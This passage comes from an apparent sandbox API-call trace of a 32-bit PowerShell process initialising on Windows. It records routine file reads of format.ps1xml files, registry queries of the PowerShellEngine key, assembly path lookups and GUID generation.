nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x2fc214a*, lpNumberOfBytesRead=0x25e394*=0x0, lpOverlapped=0x0) returned 1 [0044.481] GetLastError () returned 0x0 [0044.481] ReadFile (in: hFile=0x314, lpBuffer=0x2fc2ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x2fc2ae0*, lpNumberOfBytesRead=0x25e394*=0x0, lpOverlapped=0x0) returned 1 [0044.481] GetLastError () returned 0x0 [0044.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25def4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0044.482] GetLastError () returned 0x0 [0044.482] SetErrorMode (uMode=0x1) returned 0x1 [0044.482] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2fe3adc | out: lpFileInformation=0x2fe3adc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0044.482] GetLastError () returned 0x0 [0044.482] SetErrorMode (uMode=0x1) returned 0x1 [0044.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25dec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0044.482] GetLastError () returned 0x0 [0044.482] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e318 | out: phkResult=0x25e318*=0x314) returned 0x0 [0044.482] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e360, lpData=0x0, lpcbData=0x25e35c*=0x0 | out: lpType=0x25e360*=0x1, lpData=0x0, lpcbData=0x25e35c*=0x56) returned 0x0 [0044.482] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e360, lpData=0x54e2a0, lpcbData=0x25e35c*=0x56 | out: lpType=0x25e360*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x25e35c*=0x56) returned 0x0 [0044.482] RegCloseKey (hKey=0x314) returned 0x0 [0044.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25dec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0044.482] GetLastError () returned 0x0 [0044.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25de54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0044.482] GetLastError () returned 0x0 [0044.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x25db84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a [0044.485] GetLastError () returned 0x0 [0044.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25db84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0044.485] GetLastError () returned 0x57 [0044.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x25db84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0044.486] GetLastError () returned 0x57 [0044.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.486] GetLastError () returned 0x57 [0044.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x25db84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0044.486] GetLastError () returned 0x57 [0044.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x25db84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52 [0044.487] GetLastError () returned 0x57 [0044.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x25db84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74 [0044.500] GetLastError () returned 0x57 [0044.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x25db84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0044.500] GetLastError () returned 0x57 [0044.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x25db84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60 [0044.501] GetLastError () returned 0x57 [0044.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x25db84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0044.502] GetLastError () returned 0x57 [0044.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x25db84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0044.502] GetLastError () returned 0x57 [0044.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x25db84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0044.503] GetLastError () returned 0x57 [0044.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x25db84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50 [0044.503] GetLastError () returned 0x57 [0044.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x25db84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e [0044.504] GetLastError () returned 0x57 [0044.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x25db84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c [0044.510] GetLastError () returned 0x57 [0044.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x25db84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a [0044.511] GetLastError () returned 0x57 [0044.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25db84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0044.511] GetLastError () returned 0x57 [0044.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x25db84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0044.511] GetLastError () returned 0x57 [0044.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.511] GetLastError () returned 0x57 [0044.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.511] GetLastError () returned 0x57 [0044.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.511] GetLastError () returned 0x57 [0044.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.511] GetLastError () returned 0x57 [0044.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.511] GetLastError () returned 0x57 [0044.527] VirtualQuery (in: lpAddress=0x25d070, lpBuffer=0x25e070, dwLength=0x1c | out: lpBuffer=0x25e070*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.530] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x57fcbbf7, Data2=0x3661, Data3=0x4039, Data4=([0]=0x92, [1]=0xf3, [2]=0x99, [3]=0xe6, [4]=0x9a, [5]=0x1b, [6]=0xc8, [7]=0x3b))) returned 0x0 [0044.531] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xae9d330e, Data2=0xe5c0, Data3=0x4acc, Data4=([0]=0x9a, [1]=0x48, [2]=0xe2, [3]=0x26, [4]=0x1f, [5]=0x22, [6]=0x77, [7]=0x92))) returned 0x0 [0044.531] VirtualQuery (in: lpAddress=0x25d0e8, lpBuffer=0x25e0e8, dwLength=0x1c | out: lpBuffer=0x25e0e8*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.531] VirtualQuery (in: lpAddress=0x25d0e8, lpBuffer=0x25e0e8, dwLength=0x1c | out: lpBuffer=0x25e0e8*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.531] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xf86385c6, Data2=0x3bf, Data3=0x4149, Data4=([0]=0xb9, [1]=0x2c, [2]=0x19, [3]=0xfc, [4]=0x4a, [5]=0x3c, [6]=0x39, [7]=0xf))) returned 0x0 [0044.534] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xf9030419, Data2=0xea84, Data3=0x48b7, Data4=([0]=0x92, [1]=0x9c, [2]=0x11, [3]=0x66, [4]=0x9c, [5]=0x4b, [6]=0x1, [7]=0xe9))) returned 0x0 [0044.534] VirtualQuery (in: lpAddress=0x25d214, lpBuffer=0x25e214, dwLength=0x1c | out: lpBuffer=0x25e214*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.534] VirtualQuery (in: lpAddress=0x25d0c0, lpBuffer=0x25e0c0, dwLength=0x1c | out: lpBuffer=0x25e0c0*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.534] VirtualQuery (in: lpAddress=0x25d0c0, lpBuffer=0x25e0c0, dwLength=0x1c | out: lpBuffer=0x25e0c0*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.534] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x56886b71, Data2=0xe381, Data3=0x4607, Data4=([0]=0xbb, [1]=0xdd, [2]=0x14, [3]=0x4e, [4]=0xa2, [5]=0x69, [6]=0xa4, [7]=0xe7))) returned 0x0 [0044.535] VirtualQuery (in: lpAddress=0x25d214, lpBuffer=0x25e214, dwLength=0x1c | out: lpBuffer=0x25e214*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.535] VirtualQuery (in: lpAddress=0x25d12c, lpBuffer=0x25e12c, dwLength=0x1c | out: lpBuffer=0x25e12c*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.535] VirtualQuery (in: lpAddress=0x25cde0, lpBuffer=0x25dde0, dwLength=0x1c | out: lpBuffer=0x25dde0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.535] VirtualQuery (in: lpAddress=0x25cde0, lpBuffer=0x25dde0, dwLength=0x1c | out: lpBuffer=0x25dde0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.536] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xbabe25df, Data2=0x65dc, Data3=0x4413, Data4=([0]=0xb6, [1]=0xc7, [2]=0x41, [3]=0xb3, [4]=0x31, [5]=0x11, [6]=0x24, [7]=0xd6))) returned 0x0 [0044.536] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xb1e82800, Data2=0x6321, Data3=0x4e9e, Data4=([0]=0xb5, [1]=0xbb, [2]=0x83, [3]=0xf4, [4]=0xca, [5]=0xe5, [6]=0xf0, [7]=0x42))) returned 0x0 [0044.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25de2c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0044.536] GetLastError () returned 0x57 [0044.536] SetErrorMode (uMode=0x1) returned 0x1 [0044.536] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314 [0044.536] GetLastError () returned 0x0 [0044.536] GetFileType (hFile=0x314) returned 0x1 [0044.536] SetErrorMode (uMode=0x1) returned 0x1 [0044.536] GetFileType (hFile=0x314) returned 0x1 [0044.536] ReadFile (in: hFile=0x314, lpBuffer=0x3048bdc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3048bdc*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.537] GetLastError () returned 0x0 [0044.538] ReadFile (in: hFile=0x314, lpBuffer=0x3048bdc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3048bdc*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.538] GetLastError () returned 0x0 [0044.538] ReadFile (in: hFile=0x314, lpBuffer=0x3048bdc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3048bdc*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.538] GetLastError () returned 0x0 [0044.538] ReadFile (in: hFile=0x314, lpBuffer=0x3048bdc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3048bdc*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.538] GetLastError () returned 0x0 [0044.539] ReadFile (in: hFile=0x314, lpBuffer=0x3048bdc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3048bdc*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.539] GetLastError () returned 0x0 [0044.539] ReadFile (in: hFile=0x314, lpBuffer=0x3048bdc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3048bdc*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.539] GetLastError () returned 0x0 [0044.539] ReadFile (in: hFile=0x314, lpBuffer=0x3048bdc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3048bdc*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.539] GetLastError () returned 0x0 [0044.539] ReadFile (in: hFile=0x314, lpBuffer=0x3048bdc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3048bdc*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.539] GetLastError () returned 0x0 [0044.540] ReadFile (in: hFile=0x314, lpBuffer=0x3048bdc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3048bdc*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.540] GetLastError () returned 0x0 [0044.540] ReadFile (in: hFile=0x314, lpBuffer=0x3048bdc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3048bdc*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.540] GetLastError () returned 0x0 [0044.540] ReadFile (in: hFile=0x314, lpBuffer=0x3048bdc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3048bdc*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.540] GetLastError () returned 0x0 [0044.540] ReadFile (in: hFile=0x314, lpBuffer=0x3048bdc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3048bdc*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.540] GetLastError () returned 0x0 [0044.540] ReadFile (in: hFile=0x314, lpBuffer=0x3048bdc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3048bdc*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.541] GetLastError () returned 0x0 [0044.541] ReadFile (in: hFile=0x314, lpBuffer=0x3048bdc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3048bdc*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.541] GetLastError () returned 0x0 [0044.541] ReadFile (in: hFile=0x314, lpBuffer=0x3048bdc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3048bdc*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.541] GetLastError () returned 0x0 [0044.541] ReadFile (in: hFile=0x314, lpBuffer=0x3048bdc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3048bdc*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.541] GetLastError () returned 0x0 [0044.542] ReadFile (in: hFile=0x314, lpBuffer=0x3048bdc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3048bdc*, lpNumberOfBytesRead=0x25e394*=0x1000, lpOverlapped=0x0) returned 1 [0044.542] GetLastError () returned 0x0 [0044.542] ReadFile (in: hFile=0x314, lpBuffer=0x3048bdc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3048bdc*, lpNumberOfBytesRead=0x25e394*=0xbce, lpOverlapped=0x0) returned 1 [0044.542] GetLastError () returned 0x0 [0044.542] ReadFile (in: hFile=0x314, lpBuffer=0x304834a, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x304834a*, lpNumberOfBytesRead=0x25e394*=0x0, lpOverlapped=0x0) returned 1 [0044.543] GetLastError () returned 0x0 [0044.543] ReadFile (in: hFile=0x314, lpBuffer=0x3048bdc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e394, lpOverlapped=0x0 | out: lpBuffer=0x3048bdc*, lpNumberOfBytesRead=0x25e394*=0x0, lpOverlapped=0x0) returned 1 [0044.543] GetLastError () returned 0x0 [0044.543] CloseHandle (hObject=0x314) returned 1 [0044.543] GetLastError () returned 0x0 [0044.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25def4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0044.543] GetLastError () returned 0x0 [0044.543] SetErrorMode (uMode=0x1) returned 0x1 [0044.543] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x3069bd8 | out: lpFileInformation=0x3069bd8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0044.543] GetLastError () returned 0x0 [0044.543] SetErrorMode (uMode=0x1) returned 0x1 [0044.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25dec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0044.543] GetLastError () returned 0x0 [0044.543] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, 